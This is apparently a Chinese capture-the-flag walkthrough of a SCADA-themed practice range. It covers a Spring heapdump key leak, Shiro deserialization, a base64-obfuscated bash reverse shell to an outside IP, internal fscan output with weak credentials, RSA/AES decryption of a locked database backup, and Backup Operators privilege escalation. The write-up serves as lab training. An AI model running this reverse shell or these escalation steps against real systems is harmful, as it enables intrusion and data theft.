考点:
- 内存泄露
- shiro反序列化RCE
- 工控入门
- rsa+aes解密
- Backup Operators提权
和hospital一样,找内存泄露
http://121.89.193.140:8080/actuator/heapdump
这里用hospital里提过的内存泄露检测工具JDumpSpider(https://github.com/whwlsfb/JDumpSpider)可以直接找到key,然后工具一把梭即可
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
...
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES
...
用工具弹一下shell
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMzYueHgueHgvOTM4MyAwPiYx}|{base64,-d}|{bash,-i}'
扫内网
(remote) root@security:/# ./fscan -h 172.22.17.213/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.17.6 is alive
(icmp) Target 172.22.17.213 is alive
[*] Icmp alive hosts len is: 2
172.22.17.213:8080 open
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.6:80 open
172.22.17.213:22 open
172.22.17.6:21 open
[*] alive ports len is: 7
start vulscan
[*] NetInfo:
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
[*] NetBios: 172.22.17.6 WORKGROUP\WIN-ENGINEER
[*] WebTitle: http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=648FF75E8E0080D29B27F5880686BCC6
[*] WebTitle: http://172.22.17.213:8080/login;jsessionid=648FF75E8E0080D29B27F5880686BCC6 code:200 len:2936 title:火创能源监控画面管理平台
[+] ftp://172.22.17.6:21:anonymous
[->]Modbus
[->]PLC
[->]web.config
[->]WinCC
[->]内部软件
[->]火创能源内部资料
[*] WebTitle: http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2
扫出来一个匿名ftp,连一下
WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3
再扫一下26这个段
(remote) root@security:/# ./fscan -h 172.22.26.1/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.26.11 is alive
[*] Icmp alive hosts len is: 1
172.22.26.11:1433 open
172.22.26.11:445 open
172.22.26.11:139 open
172.22.26.11:135 open
172.22.26.11:80 open
[*] alive ports len is: 5
start vulscan
[*] NetBios: 172.22.26.11 WORKGROUP\WIN-SCADA
[*] NetInfo:
[*]172.22.26.11
[->]WIN-SCADA
[->]172.22.26.11
[+] mssql:172.22.26.11:1433:sa 123456
[*] WebTitle: http://172.22.26.11 code:200 len:703 title:IIS Windows Server
已完成 5/5
[*] 扫描结束,耗时: 5.730632575s
rdp连172.22.26.11,然后点一下那个锅炉开就有flag了
按住windows+d回主页,可以看到桌面上有个ScadaDB.sql.locky,我们直接连数据库里那个flag是空的,得找备份,但这个备份被加密了,这里我们用题目描述里给的密钥解密一下即可
题目描述里给了一个privateKey和encryptedAesKey,使用privateKey用rsa加密了aeskey得到的encryptedAesKey
#privateKey
<RSAKeyValue><Modulus>uoL2CAaVtMVp7b4/Ifcex2Artuu2tvtBO25JdMwAneu6gEPCrQvDyswebchA1LnV3e+OJV5kHxFTp/diIzSnmnhUmfZjYrshZSLGm1fTwcRrL6YYVsfVZG/4ULSDURfAihyN1HILP/WqCquu1oWo0CdxowMsZpMDPodqzHcFCxE=</Modulus><Exponent>AQAB</Exponent><P>2RPqaofcJ/phIp3QFCEyi0kj0FZRQmmWmiAmg/C0MyeX255mej8Isg0vws9PNP3RLLj25O1pbIJ+fqwWfUEmFw==</P><Q>2/QGgIpqpxODaJLQvjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbkVfy5Fw==</Q><DP>ulK51o6ejUH/tfK281A7TgqNTvmH7fUra0dFR+KHCZFmav9e/na0Q//FivTeC6IAtN5eLMkKwDSR1rBm7UPKKQ==</DP><DQ>PO2J541wIbvsCMmyfR3KtQbAmVKmPHRUkG2VRXLBV0zMwke8hCAE5dQkcct3GW8jDsJGS4r0JsOvIRq5gYAyHQ==</DQ><InverseQ>JS2ttB0WJm223plhJQrWqSvs9LdEeTd8cgNWoyTkMOkYIieRTRko/RuXufgxppl4bL9RRTI8e8tkHoPzNLK4bA==</InverseQ><D>tuLJ687BJ5RYraZac6zFQo178A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDoxRqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQNUM6ss/2/CMM/EgM9vz0=</D></RSAKeyValue>
先把XML转成PEM格式(https://www.ssleye.com/ssltool/pem_xml.html)
-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----
然后找个在线网站把encryptedAesKey解一下(https://www.lddgo.net/encrypt/rsa)
最后写个aes脚本解一下找个sql文件,把前16位作为iv
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64
# 读取加密文件内容
encrypted_file = 'ScadaDB.sql.locky'
with open(encrypted_file, 'rb') as file:
encrypted_data = file.read()
# 解密密钥
key = 'cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk='
key = base64.b64decode(key)
# 按照每 16 位数据作为 IV 进行解密
iv = encrypted_data[:16]
# 创建 AES 解密器
cipher = AES.new(key, AES.MODE_CBC, IV=iv)
# 解密数据(去除 IV 后的部分)
decrypted_data = unpad(cipher.decrypt(encrypted_data[16:]), AES.block_size)
# 写入解密后的内容到新文件
decrypted_file = 'decrypted_file.txt'
with open(decrypted_file, 'wb') as file:
file.write(decrypted_data)
print(f'文件解密完成,解密后的数据已保存到 {decrypted_file}')
还有一个flag在SCADA工程师的个人PC上,要提权。还是那个ftp,可以翻到很多用户资料以及他们的密码规范初始密码为账户名+@+工号,比如工程师chenhua,我们可以拼出来密码为chenhua@0813,这个可以直接rdp上172.22.17.6,因为用户在Backup Operators组内,所以可以使用Backup Operators组内权限提权(https://github.com/k4sth4/SeBackupPrivilege)
PS C:\Windows\system32> cd C:\Users\chenhua\Desktop\
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\Users\chenhua\Desktop> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\Users\chenhua\Desktop> Set-SeBackupPrivilege
PS C:\Users\chenhua\Desktop> Get-SeBackupPrivilege
SeBackupPrivilege is enabled
PS C:\Users\chenhua\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\flag\flag02.txt C:\Users\chenhua\Desktop\flag02.txt -Overwrite
Copied 350 bytes
PS C:\Users\chenhua\Desktop> type .\flag02.txt
_____.__ _______ ________
_/ ____\ | _____ ____ \ _ \ \_____ \
\ __\| | \__ \ / ___\/ /_\ \ / ____/
| | | |__/ __ \_/ /_/ > \_/ \/ \
|__| |____(____ /\___ / \_____ /\_______ \
\//_____/ \/ \/
flag02: flag{cd4c83d9-0fc9-47f3-a947-c34c5e5266fb}
PS C:\Users\chenhua\Desktop>
这个靶场是昨年工业信息安全技能大赛复赛火力发电场景的原题,当时帮朋友看题没打穿,这次总算有机会了。当时只有五个队打穿,基本上全是运营商,令人感叹